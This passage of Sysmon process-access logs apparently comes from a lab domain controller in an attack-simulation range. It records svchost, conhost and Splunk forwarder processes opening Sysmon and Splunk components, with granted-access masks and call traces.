tdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2346,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.312\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.312","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2347,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.312\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.312","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2348,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.312\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.312","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2349,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.312\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.312","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2350,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.312\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.312","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2351,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.312\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.312","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2352,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.312\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.312","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2353,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.312\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01D2-5F25-0000-00103D1F0400}\r\nTargetProcessId: 3836\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:58.312","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01D2-5F25-0000-00103D1F0400}","TargetProcessId":"3836","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2354,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:58.469\r\nSourceProcessGUID: {A837DB8D-01D2-5F25-0000-00103D1F0400}\r\nSourceProcessId: 3836\r\nSourceThreadId: 4080\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program 